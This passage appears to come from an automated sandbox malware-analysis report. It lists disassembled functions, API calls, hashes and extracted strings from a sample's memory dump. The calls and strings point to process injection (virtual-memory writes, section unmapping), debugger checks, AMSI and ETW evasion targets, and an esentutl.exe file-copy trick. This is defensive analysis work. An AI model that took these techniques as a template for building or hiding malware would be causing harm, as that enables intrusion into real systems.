                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 031D8814
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                              • String ID: CreateProcessAsUserW$Kernel32
                                                                                              • API String ID: 3130163322-2353454454
                                                                                              • Opcode ID: b302c50c69f49f0a43aa59df760d5b1f4f441c3f8cd542ae497102ec5477f89e
                                                                                              • Instruction ID: c89fa44416b631fa59009a44820467f3d6bc040ca2600cf32d3bb1a73d2ad3b4
                                                                                              • Opcode Fuzzy Hash: b302c50c69f49f0a43aa59df760d5b1f4f441c3f8cd542ae497102ec5477f89e
                                                                                              • Instruction Fuzzy Hash: 1F11D3B6614248AFDB41EEADDC51F9A77ECEB4DA00F514024BA18D7200D734E9108B25
                                                                                              Function 031D7A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031D7A9F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                              • API String ID: 4072585319-445027087
                                                                                              • Opcode ID: 06d9509fb5f560ac682468ce7ed53237841a9b822b725dcafdbc52bdef527be4
                                                                                              • Instruction ID: 7cbffe35a13c661fc1b5b6faecba21afd8bbb6634b33e52cb15194b4c4cf93ed
                                                                                              • Opcode Fuzzy Hash: 06d9509fb5f560ac682468ce7ed53237841a9b822b725dcafdbc52bdef527be4
                                                                                              • Instruction Fuzzy Hash: 8C114479214348BFDB05EFA9EC51E9EB7ACEB4D600F514465B910DB640EB30AA04CB64
                                                                                              Function 031D7A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031D7A9F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                              • API String ID: 4072585319-445027087
                                                                                              • Opcode ID: b410be5ef7a2bf21b68c339032f45269f7fda18c96d57d0b3f6ac79fc16425e3
                                                                                              • Instruction ID: 7f1741f267ec5ba9e096bdcf4ca7cac94a89f77189604d7751399979908eb2fd
                                                                                              • Opcode Fuzzy Hash: b410be5ef7a2bf21b68c339032f45269f7fda18c96d57d0b3f6ac79fc16425e3
                                                                                              • Instruction Fuzzy Hash: 0D114479214348BFDB05EF95EC51E9EB7ACEB4D600F514465B910DB640EB30AA04CB64
                                                                                              Function 031D8400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D8471
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                              • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                              • API String ID: 2521977463-737317276
                                                                                              • Opcode ID: 48f23c1a16f24d381f6567b6fb4cda7d6595ddbfc0c93b79485eba3f48d7a41d
                                                                                              • Instruction ID: 4d4735fa2927d1a05726e44e6775e831b271ab7eb3e1a385538a9ecf88a9fde4
                                                                                              • Opcode Fuzzy Hash: 48f23c1a16f24d381f6567b6fb4cda7d6595ddbfc0c93b79485eba3f48d7a41d
                                                                                              • Instruction Fuzzy Hash: 72012979214348AFDB15EFA9EC51E9EBBACEB4EA00F518464F914DB641DB34A9008B24
                                                                                              Function 031D7D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D7DEC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                              • String ID: Ntdll$yromeMlautriVetirW
                                                                                              • API String ID: 2719805696-3542721025
                                                                                              • Opcode ID: 218d2faa62a9ca11a96c46d621b8c613bbae424d667d2f6d97a5087e05dc403f
                                                                                              • Instruction ID: 7334c7630e839f5539f71adafa818d2e732c30a5379ceeed01369f5f8a77b15e
                                                                                              • Opcode Fuzzy Hash: 218d2faa62a9ca11a96c46d621b8c613bbae424d667d2f6d97a5087e05dc403f
                                                                                              • Instruction Fuzzy Hash: C7015E79214348AFCB01EF99EC55E9EBBECEB4EA00F508464B810DB680DB30ED14CB64
                                                                                              Function 031D8670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 031D86D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                              • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                              • API String ID: 3503870465-2520021413
                                                                                              • Opcode ID: b515a9ef0e3938b5cd828536d1ea47e14434c8af810e93155a8dd448fab97c23
                                                                                              • Instruction ID: 4693b60449f3c4cd5ee648149d261513dfb277ee783eadf733ad39ae6ff51acd
                                                                                              • Opcode Fuzzy Hash: b515a9ef0e3938b5cd828536d1ea47e14434c8af810e93155a8dd448fab97c23
                                                                                              • Instruction Fuzzy Hash: 66016D3D614348AFDB05EFA9EC51E5EBBADEB4EA10F918465B8109B640EB34A900C664
                                                                                              Function 031DDBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlI.N(?,?,00000000,031DDC7E), ref: 031DDC2C
                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,031DDC7E), ref: 031DDC42
                                                                                              • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,031DDC7E), ref: 031DDC61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$DeleteFileNameName_
                                                                                              • String ID:
                                                                                              • API String ID: 4284456518-0
                                                                                              • Opcode ID: 7a5a20eee3082041f2813f2df9c7e296f23d9062c2f44950058c4b931404ae9b
                                                                                              • Instruction ID: 9d7bc23f6756bd9ebe54ab9a09901fdf10b5aae966dadb23aecca9d989aec539
                                                                                              • Opcode Fuzzy Hash: 7a5a20eee3082041f2813f2df9c7e296f23d9062c2f44950058c4b931404ae9b
                                                                                              • Instruction Fuzzy Hash: 620162799443486FEB05EBA0AD91FDDB7BCAF4A704F514496D200EA081DBB4AB048725
                                                                                              Function 031DDC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031C4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 031C4F2E
                                                                                              • RtlI.N(?,?,00000000,031DDC7E), ref: 031DDC2C
                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,031DDC7E), ref: 031DDC42
                                                                                              • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,031DDC7E), ref: 031DDC61
                                                                                                • Part of subcall function 031C4C60: SysFreeString.OLEAUT32(031DF4A4), ref: 031C4C6E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                              • String ID:
                                                                                              • API String ID: 1530111750-0
                                                                                              • Opcode ID: 4f0c81381db166d79dfe8ec0a1fe8d755a97cb58f718d8ba0dc793f12d131b6c
                                                                                              • Instruction ID: 7d132b2384d7956405f185e1db58b3addd88bcf6d6b187c677df85b524acf2f1
                                                                                              • Opcode Fuzzy Hash: 4f0c81381db166d79dfe8ec0a1fe8d755a97cb58f718d8ba0dc793f12d131b6c
                                                                                              • Instruction Fuzzy Hash: DE012C7595430CBFDB11EBA4ED52FDDB3BCEB4E604F5144A5E200E6180EBB4AB048664
                                                                                              Function 031D6DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031D6D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,031D6DB9,?,?,?,00000000), ref: 031D6D99
                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,031D6EAC,00000000,00000000,031D6E2B,?,00000000,031D6E9B), ref: 031D6E17
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFromInstanceProg
                                                                                              • String ID:
                                                                                              • API String ID: 2151042543-0
                                                                                              • Opcode ID: 539583ae73e7a44170ac7b5b1fcc5a640aa71a8e8c40b4a66581d1927e2e5a3b
                                                                                              • Instruction ID: 1fbfbd7045470d820d61e77907ec3c4239da9daec8a843ed75485f19d7f88c66
                                                                                              • Opcode Fuzzy Hash: 539583ae73e7a44170ac7b5b1fcc5a640aa71a8e8c40b4a66581d1927e2e5a3b
                                                                                              • Instruction Fuzzy Hash: F5012635208704AFD715EFA1DC2286FBBBCE74EB00F920839F404E2680EB306D20C4A4
                                                                                              Function 031DF7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InetIsOffline.URL(00000000,00000000,031EB784,?,?,?,00000000,00000000), ref: 031DF801
                                                                                                • Part of subcall function 031D89D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0324738C,Function_0000662C,00000004,0324739C,0324738C,05F5E103,00000040,032473A0,74AE0000,00000000,00000000), ref: 031D8AAA
                                                                                                • Part of subcall function 031DF6E8: GetModuleHandleW.KERNEL32(KernelBase,?,031DFAEB,UacInitialize,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,ScanString,03247380,031EB7B8,Initialize), ref: 031DF6EE
                                                                                                • Part of subcall function 031DF6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 031DF700
                                                                                                • Part of subcall function 031DF744: GetModuleHandleW.KERNEL32(KernelBase), ref: 031DF754
                                                                                                • Part of subcall function 031DF744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 031DF766
                                                                                                • Part of subcall function 031DF744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 031DF77D
                                                                                                • Part of subcall function 031C7E5C: GetFileAttributesA.KERNEL32(00000000,?,031E041F,ScanString,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanString,03247380,031EB7B8,UacScan,03247380,031EB7B8,UacInitialize), ref: 031C7E67
                                                                                                • Part of subcall function 031CC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0333B8B8,?,031E0751,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,OpenSession), ref: 031CC37B
                                                                                                • Part of subcall function 031DDD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,031DDE40), ref: 031DDDAB
                                                                                                • Part of subcall function 031DDD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,031DDE40), ref: 031DDDDB
                                                                                                • Part of subcall function 031DDD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 031DDDF0
                                                                                                • Part of subcall function 031DDD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 031DDE1C
                                                                                                • Part of subcall function 031DDD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 031DDE25
                                                                                                • Part of subcall function 031C7E80: GetFileAttributesA.KERNEL32(00000000,?,031E356F,ScanString,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8,Initialize), ref: 031C7E8B
                                                                                                • Part of subcall function 031C8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,031E370D,OpenSession,03247380,031EB7B8,ScanString,03247380,031EB7B8,Initialize,03247380,031EB7B8,ScanString,03247380,031EB7B8), ref: 031C8055
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                              • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                              • API String ID: 297057983-2644593349
                                                                                              • Opcode ID: b223cbff77265a38e381ce7f3f885762f0a343e89113fc99ac5b1eafacb04ee2
                                                                                              • Instruction ID: c41d9fc9d297105ec49f1a43e93ab3e88f9f0fb026c542dadb42649bd13a7dae
                                                                                              • Opcode Fuzzy Hash: b223cbff77265a38e381ce7f3f885762f0a343e89113fc99ac5b1eafacb04ee2
                                                                                              • Instruction Fuzzy Hash: 7314FC3DA1C26C8FCB12EB65DC90ACE73B5EB9D700F5080A99149AF654DF31AE818F51
                                                                                              Function 031E8128 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778processthreadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
